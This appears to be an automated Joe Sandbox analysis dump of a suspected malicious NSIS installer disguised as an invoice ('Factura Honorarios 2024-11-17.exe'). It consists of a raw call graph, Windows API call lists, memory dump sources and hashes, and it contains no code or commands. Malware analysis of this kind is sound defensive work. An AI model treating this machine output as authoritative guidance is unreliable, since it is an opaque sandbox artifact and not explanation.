4653->4647 4655 40207b 4653->4655 4654->4653 4654->4655 4668 4066cd WideCharToMultiByte 4655->4668 4659 4020c5 4661 4052ec 24 API calls 4659->4661 4660 40208c 4662 402094 4660->4662 4663 4020ab 4660->4663 4664 40209c 4661->4664 4665 401423 24 API calls 4662->4665 4671 6ff4177b 4663->4671 
4664->4656 4666 4020e8 FreeLibrary 4664->4666 4665->4664 4666->4656 4669 4066f7 GetProcAddress 4668->4669 4670 402086 4668->4670 4669->4670 4670->4659 4670->4660 4672 6ff417ae 4671->4672 4713 6ff41b63 4672->4713 4674 6ff417b5 4675 6ff418da 4674->4675 4676 6ff417c6 4674->4676 4677 6ff417cd 4674->4677 4675->4664 4763 6ff42356 4676->4763 4747 6ff42398 4677->4747 4682 6ff41831 4688 6ff41837 4682->4688 4689 6ff41882 4682->4689 4683 6ff41813 4776 6ff4256d 4683->4776 4684 6ff417e3 4687 6ff417e9 4684->4687 4693 6ff417f4 4684->4693 4685 6ff417fc 4697 6ff417f2 4685->4697 4773 6ff42d2f 4685->4773 4687->4697 4757 6ff42a74 4687->4757 4795 6ff415c6 4688->4795 4691 6ff4256d 10 API calls 4689->4691 4698 6ff41873 4691->4698 4692 6ff41819 4787 6ff415b4 4692->4787 4767 6ff42728 4693->4767 4697->4682 4697->4683 4704 6ff418c9 4698->4704 4802 6ff42530 4698->4802 4701 6ff4256d 10 API calls 4701->4698 4703 6ff417fa 4703->4697 4704->4675 4706 6ff418d3 GlobalFree 4704->4706 4706->4675 4710 6ff418b5 4710->4704 4806 6ff4153d wsprintfW 4710->4806 4711 6ff418ae FreeLibrary 4711->4710 4809 6ff4121b GlobalAlloc 4713->4809 4715 6ff41b87 4810 6ff4121b GlobalAlloc 4715->4810 4717 6ff41dad GlobalFree GlobalFree GlobalFree 4718 6ff41dca 4717->4718 4733 6ff41e14 4717->4733 4719 6ff42196 4718->4719 4728 6ff41ddf 4718->4728 4718->4733 4721 6ff421b8 GetModuleHandleW 4719->4721 4719->4733 4720 6ff41c68 GlobalAlloc 4742 6ff41b92 4720->4742 4723 6ff421de 4721->4723 4724 6ff421c9 LoadLibraryW 4721->4724 4722 6ff41cd1 GlobalFree 4722->4742 4817 6ff41621 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4723->4817 4724->4723 4724->4733 4725 6ff41cb3 lstrcpyW 4726 6ff41cbd lstrcpyW 4725->4726 4726->4742 4728->4733 4813 6ff4122c 4728->4813 4729 6ff42230 4731 6ff4223d lstrlenW 4729->4731 4729->4733 4818 6ff41621 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4731->4818 4732 6ff42068 4816 6ff4121b GlobalAlloc 4732->4816 4733->4674 4734 6ff421f0 4734->4729 
4745 6ff4221a GetProcAddress 4734->4745 4735 6ff420f0 4735->4733 4740 6ff42138 lstrcpyW 4735->4740 4738 6ff41d0f 4738->4742 4811 6ff4158f GlobalSize GlobalAlloc 4738->4811 4739 6ff41fa9 GlobalFree 4739->4742 4740->4733 4741 6ff42257 4741->4733 4742->4717 4742->4720 4742->4722 4742->4725 4742->4726 4742->4732 4742->4733 4742->4735 4742->4738 4742->4739 4744 6ff4122c 2 API calls 4742->4744 4744->4742 4745->4729 4746 6ff42071 4746->4674 4754 6ff423b0 4747->4754 4748 6ff4122c GlobalAlloc lstrcpynW 4748->4754 4750 6ff424d9 GlobalFree 4753 6ff417d3 4750->4753 4750->4754 4751 6ff42483 GlobalAlloc CLSIDFromString 4751->4750 4752 6ff42458 GlobalAlloc WideCharToMultiByte 4752->4750 4753->4684 4753->4685 4753->4697 4754->4748 4754->4750 4754->4751 4754->4752 4756 6ff424a2 4754->4756 4820 6ff412ba 4754->4820 4756->4750 4824 6ff426bc 4756->4824 4759 6ff42a86 4757->4759 4758 6ff42b2b ReadFile 4760 6ff42b49 4758->4760 4759->4758 4761 6ff42c45 4760->4761 4762 6ff42c3a GetLastError 4760->4762 4761->4697 4762->4761 4764 6ff4236b 4763->4764 4765 6ff417cc 4764->4765 4766 6ff42376 GlobalAlloc 4764->4766 4765->4677 4766->4764 4771 6ff42758 4767->4771 4768 6ff42806 4770 6ff4280c GlobalSize 4768->4770 4772 6ff42816 4768->4772 4769 6ff427f3 GlobalAlloc 4769->4772 4770->4772 4771->4768 4771->4769 4772->4703 4774 6ff42d3a 4773->4774 4775 6ff42d7a GlobalFree 4774->4775 4827 6ff4121b GlobalAlloc 4776->4827 4778 6ff425f0 MultiByteToWideChar 4781 6ff42577 4778->4781 4779 6ff42612 StringFromGUID2 4779->4781 4780 6ff42623 lstrcpynW 4780->4781 4781->4778 4781->4779 4781->4780 4782 6ff42636 wsprintfW 4781->4782 4783 6ff4265a GlobalFree 4781->4783 4784 6ff4268f GlobalFree 4781->4784 4785 6ff41272 2 API calls 4781->4785 4828 6ff412e1 4781->4828 4782->4781 4783->4781 4784->4692 4785->4781 4832 6ff4121b GlobalAlloc 4787->4832 4789 6ff415b9 4790 6ff415c6 2 API calls 4789->4790 4791 6ff415c3 4790->4791 4792 6ff41272 4791->4792 4793 6ff412b5 GlobalFree 4792->4793 4794 6ff4127b GlobalAlloc lstrcpynW 
4792->4794 4793->4698 4794->4793 4796 6ff415e4 4795->4796 4797 6ff415d6 lstrcpyW 4795->4797 4796->4797 4800 6ff415f0 4796->4800 4799 6ff4161d 4797->4799 4799->4701 4800->4799 4801 6ff4160d wsprintfW 4800->4801 4801->4799 4803 6ff41895 4802->4803 4804 6ff4253e 4802->4804 4803->4710 4803->4711 4804->4803 4805 6ff4255a GlobalFree 4804->4805 4805->4804 4807 6ff41272 2 API calls 4806->4807 4808 6ff4155e 4807->4808 4808->4704 4809->4715 4810->4742 4812 6ff415ad 4811->4812 4812->4738 4819 6ff4121b GlobalAlloc 4813->4819 4815 6ff4123b lstrcpynW 4815->4733 4816->4746 4817->4734 4818->4741 4819->4815 4821 6ff412c1 4820->4821 4822 6ff4122c 2 API calls 4821->4822 4823 6ff412df 4822->4823 4823->4754 4825 6ff42720 4824->4825 4826 6ff426ca VirtualAlloc 4824->4826 4825->4756 4826->4825 4827->4781 4829 6ff4130c 4828->4829 4830 6ff412ea 4828->4830 4829->4781 4830->4829 4831 6ff412f0 lstrcpyW 4830->4831 4831->4829 4832->4789 5899 403932 5900 40393d 5899->5900 5901 403941 5900->5901 5902 403944 GlobalAlloc 5900->5902 5902->5901 5908 6ff41000 5909 6ff4101b 5 API calls 5908->5909 5910 6ff41019 5909->5910 5911 402a35 5912 402c1f 17 API calls 5911->5912 5913 402a3b 5912->5913 5914 402a72 5913->5914 5915 40288b 5913->5915 5917 402a4d 5913->5917 5914->5915 5916 4062a6 17 API calls 5914->5916 5916->5915 5917->5915 5919 4061cb wsprintfW 5917->5919 5919->5915 5920 401735 5921 402c41 17 API calls 5920->5921 5922 40173c SearchPathW 5921->5922 5923 4029e6 5922->5923 5924 401757 5922->5924 5924->5923 5926 406284 lstrcpynW 5924->5926 5926->5923 5927 6ff42301 5928 6ff4236b 5927->5928 5929 6ff42395 5928->5929 5930 6ff42376 GlobalAlloc 5928->5930 5930->5928 5931 4014b8 5932 4014be 5931->5932 5933 401389 2 API calls 5932->5933 5934 4014c6 5933->5934 5935 401db9 GetDC 5936 402c1f 17 API calls 5935->5936 5937 401dcb GetDeviceCaps MulDiv ReleaseDC 5936->5937 5938 402c1f 17 API calls 5937->5938 5939 401dfc 5938->5939 5940 4062a6 17 API calls 5939->5940 5941 401e39 CreateFontIndirectW 5940->5941 5942 402592 
5941->5942 5943 4043ba 5944 4043d2 5943->5944 5945 4044ec 5943->5945 5950 4041fb 18 API calls 5944->5950 5946 404556 5945->5946 5947 404620 5945->5947 5954 404527 GetDlgItem SendMessageW 5945->5954 5946->5947 5948 404560 GetDlgItem 5946->5948 5952 404262 8 API calls 5947->5952 5949 40457a 5948->5949 5953 4045e1 5948->5953 5949->5953 5957 4045a0 SendMessageW LoadCursorW SetCursor 5949->5957 5951 404439 5950->5951 5955 4041fb 18 API calls 5951->5955 5956 40461b 5952->5956 5953->5947 5958 4045f3 5953->5958 5976 40421d KiUserCallbackDispatcher 5954->5976 5960 404446 CheckDlgButton 5955->5960 5977 404669 5957->5977 5962 404609 5958->5962 5963 4045f9 SendMessageW 5958->5963 5974 40421d KiUserCallbackDispatcher 5960->5974 5962->5956 5968 40460f SendMessageW 5962->5968 5963->5962 5964 404551 5965 404645 SendMessageW 5964->5965 5965->5946 5968->5956 5969 404464 GetDlgItem 5975 404230 SendMessageW 5969->5975 5971 40447a SendMessageW 5972 4044a0 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5971->5972 5973 404497 GetSysColor 5971->5973 5972->5956 5973->5972 5974->5969 5975->5971 5976->5964 5980 4058b0 ShellExecuteExW 5977->5980 5979 4045cf LoadCursorW SetCursor 5979->5953 5980->5979 5981 40283b 5982 402843 5981->5982 5983 402847 FindNextFileW 5982->5983 5984 402859 5982->5984 5983->5984 5985 4029e6 5984->5985 5987 406284 lstrcpynW 5984->5987 5987->5985

Control-flow Graph
APIs
• SetErrorMode.KERNELBASE ref: 0040337C
• GetVersion.KERNEL32 ref: 00403382
• lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033B5
• #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033F2
• OleInitialize.OLE32(00000000), ref: 004033F9
• SHGetFileInfoW.SHELL32(004216A8,00000000,?,000002B4,00000000), ref: 00403415
• GetCommandLineW.KERNEL32(00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 0040342A
• CharNextW.USER32(00000000,"C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe",00000020,"C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe",00000000,?,00000006,00000008,0000000A), ref: 00403462
  • Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
  • Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
• GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040359C
• GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035AD
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035B9
• GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035CD
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035D5
• SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035E6
• SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035EE
• DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403602
  • Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291
• OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036CD
• ExitProcess.KERNEL32 ref: 004036EE
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403701
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403710
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040371B
• lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403727
• SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403743
• DeleteFileW.KERNEL32(00420EA8,00420EA8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 0040379D
• CopyFileW.KERNEL32(C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe,00420EA8,00000001,?,00000006,00000008,0000000A), ref: 004037B1
• CloseHandle.KERNEL32(00000000,00420EA8,00420EA8,?,00420EA8,00000000,?,00000006,00000008,0000000A), ref: 004037DE
                                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 0040380D
                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00403814
                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403829
                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32 ref: 0040384C
                                                                                                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403871
                                                                                                                                  • ExitProcess.KERNEL32 ref: 00403894
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                                  • String ID: "C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab$C:\Users\user\Desktop$C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                  • API String ID: 3441113951-3260626628
                                                                                                                                  • Opcode ID: 3b799489f38086b66f8157c52dfdd850dbfcc699f0e2a59af50d3155f203b837
                                                                                                                                  • Instruction ID: 33263885e95349ea6af21411810ae013db8a0064eb9284cbb984bc5e65c45519
                                                                                                                                  • Opcode Fuzzy Hash: 3b799489f38086b66f8157c52dfdd850dbfcc699f0e2a59af50d3155f203b837
                                                                                                                                  • Instruction Fuzzy Hash: ABD12771200301ABD7207F659D45B3B3AACEB4074AF50487FF881B62E1DB7E8A55876E

                                                                                                                                  Control-flow Graph (first block 40542b-405446; rendered graph not captured)
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,00000403), ref: 00405489
                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00405498
                                                                                                                                  • GetClientRect.USER32(?,?), ref: 004054D5
                                                                                                                                  • GetSystemMetrics.USER32(00000002), ref: 004054DC
                                                                                                                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054FD
                                                                                                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040550E
                                                                                                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405521
                                                                                                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040552F
                                                                                                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405542
                                                                                                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405564
                                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 00405578
                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405599
                                                                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055A9
                                                                                                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055C2
                                                                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055CE
                                                                                                                                  • GetDlgItem.USER32(?,000003F8), ref: 004054A7
                                                                                                                                    • Part of subcall function 00404230: SendMessageW.USER32(00000028,?,00000001,0040405B), ref: 0040423E
                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004055EB
                                                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_000053BF,00000000), ref: 004055F9
                                                                                                                                  • CloseHandle.KERNELBASE(00000000), ref: 00405600
                                                                                                                                  • ShowWindow.USER32(00000000), ref: 00405624
                                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 00405629
                                                                                                                                  • ShowWindow.USER32(00000008), ref: 00405673
                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056A7
                                                                                                                                  • CreatePopupMenu.USER32 ref: 004056B8
                                                                                                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056CC
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004056EC
                                                                                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405705
                                                                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040573D
                                                                                                                                  • OpenClipboard.USER32(00000000), ref: 0040574D
                                                                                                                                  • EmptyClipboard.USER32 ref: 00405753
                                                                                                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 0040575F
                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00405769
                                                                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040577D
                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0040579D
                                                                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 004057A8
                                                                                                                                  • CloseClipboard.USER32 ref: 004057AE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                  • String ID: {$6B
                                                                                                                                  • API String ID: 590372296-3705917127
                                                                                                                                  • Opcode ID: eda15b0fa8e85a5ee056dfe18a98c225c15b93093155cbe620ec270875def271
                                                                                                                                  • Instruction ID: 3049cebfab52017954bd75dac417762e958ea911a39284ee9670f095a09d9852
                                                                                                                                  • Opcode Fuzzy Hash: eda15b0fa8e85a5ee056dfe18a98c225c15b93093155cbe620ec270875def271
                                                                                                                                  • Instruction Fuzzy Hash: BAB13970900609FFEF119FA1DD89AAE7B79EB04354F40403AFA45AA1A0CB754E52DF68
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6FF4121B: GlobalAlloc.KERNEL32(00000040,?,6FF4123B,?,6FF412DF,00000019,6FF411BE,-000000A0), ref: 6FF41225
                                                                                                                                  • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 6FF41C6F
                                                                                                                                  • lstrcpyW.KERNEL32(00000008,?), ref: 6FF41CB7
                                                                                                                                  • lstrcpyW.KERNEL32(00000808,?), ref: 6FF41CC1
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FF41CD4
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 6FF41DB6
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 6FF41DBB
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 6FF41DC0
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FF41FAA
                                                                                                                                  • lstrcpyW.KERNEL32(?,?), ref: 6FF42144
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000008), ref: 6FF421B9
                                                                                                                                  • LoadLibraryW.KERNEL32(00000008), ref: 6FF421CA
                                                                                                                                  • GetProcAddress.KERNEL32(?,?), ref: 6FF42224
                                                                                                                                  • lstrlenW.KERNEL32(00000808), ref: 6FF4223E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1913284405.000000006FF41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FF40000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6ff40000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 245916457-0
                                                                                                                                  • Opcode ID: 39d64beec636e7f1eb547bf3d193b6a3a21aa9026d89877a589d1899e46ecd58
                                                                                                                                  • Instruction ID: 0e435ed81fc1da5c2e87cf2acb6e245cd7e9388d1b4b84b16204fca037b22037
                                                                                                                                  • Opcode Fuzzy Hash: 39d64beec636e7f1eb547bf3d193b6a3a21aa9026d89877a589d1899e46ecd58
                                                                                                                                  • Instruction Fuzzy Hash: 5C22BF72D14609DADB11CFB8C9806EEBFF0FF05315F10462AD1A5E7292E77466A1CB50

                                                                                                                                  Control-flow Graph (first block 405996-4059bc; rendered graph not captured)
                                                                                                                                  APIs
                                                                                                                                  • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 004059BF
                                                                                                                                  • lstrcatW.KERNEL32(004256F0,\*.*,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 00405A07
                                                                                                                                  • lstrcatW.KERNEL32(?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 00405A2A
                                                                                                                                  • lstrlenW.KERNEL32(?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 00405A30
                                                                                                                                  • FindFirstFileW.KERNELBASE(004256F0,?,?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 00405A40
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AE0
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00405AEF
                                                                                                                                  Strings
                                                                                                                                  • \*.*, xrefs: 00405A01
                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004059A4
                                                                                                                                  • "C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe", xrefs: 00405996
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                  • String ID: "C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                  • API String ID: 2035342205-1704863889
                                                                                                                                  • Opcode ID: d7a422a1aef06f55577592658d1c21977668bb8039ea8e57eb2cb6bab4ff21c4
                                                                                                                                  • Instruction ID: c51eb27d53b6fe35fd8e31d26e19e594c53701a60ebafcf50548af423f91ca56
                                                                                                                                  • Opcode Fuzzy Hash: d7a422a1aef06f55577592658d1c21977668bb8039ea8e57eb2cb6bab4ff21c4
                                                                                                                                  • Instruction Fuzzy Hash: 0641B530A00914AACB21BB658C89BAF7778EF45729F60427FF801711D1D7BC5981DEAE

                                                                                                                                  Control-flow Graph

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0ca90ec9e464192c9522d3965182f3407f0f46d2e5c2ee50019c84c966272eaf
                                                                                                                                  • Instruction ID: 13591abb153405db8c483c3749d8f5c5d6ef56c483b3dbf0ce0e93ae11c78ade
                                                                                                                                  • Opcode Fuzzy Hash: 0ca90ec9e464192c9522d3965182f3407f0f46d2e5c2ee50019c84c966272eaf
                                                                                                                                  • Instruction Fuzzy Hash: 58F17871D04269CBDF18CFA8C8946ADBBB0FF44305F25856ED456BB281D3386A8ACF45
                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileW.KERNELBASE(?,00426738,00425EF0,00405CAA,00425EF0,00425EF0,00000000,00425EF0,00425EF0,?,?,75573420,004059B6,?,C:\Users\user\AppData\Local\Temp\,75573420), ref: 004065D2
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 004065DE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                  • String ID: 8gB
                                                                                                                                  • API String ID: 2295610775-1733800166
                                                                                                                                  • Opcode ID: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                                                                                                  • Instruction ID: 17231fcebe31093dbb05a9ce9100934524038fc54cbd693a8662f86860803725
                                                                                                                                  • Opcode Fuzzy Hash: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                                                                                                  • Instruction Fuzzy Hash: 46D012315450206BC60517387D0C84BBA589F653357128A37F466F51E4C734CC628698

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D5E
                                                                                                                                  • ShowWindow.USER32(?), ref: 00403D7B
                                                                                                                                  • DestroyWindow.USER32 ref: 00403D8F
                                                                                                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DAB
                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00403DCC
                                                                                                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DE0
                                                                                                                                  • IsWindowEnabled.USER32(00000000), ref: 00403DE7
                                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 00403E95
                                                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 00403E9F
                                                                                                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00403EB9
                                                                                                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F0A
                                                                                                                                  • GetDlgItem.USER32(?,00000003), ref: 00403FB0
                                                                                                                                  • ShowWindow.USER32(00000000,?), ref: 00403FD1
                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FE3
                                                                                                                                  • EnableWindow.USER32(?,?), ref: 00403FFE
                                                                                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404014
                                                                                                                                  • EnableMenuItem.USER32(00000000), ref: 0040401B
                                                                                                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404033
                                                                                                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404046
                                                                                                                                  • lstrlenW.KERNEL32(004236E8,?,004236E8,00000000), ref: 00404070
                                                                                                                                  • SetWindowTextW.USER32(?,004236E8), ref: 00404084
                                                                                                                                  • ShowWindow.USER32(?,0000000A), ref: 004041B8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
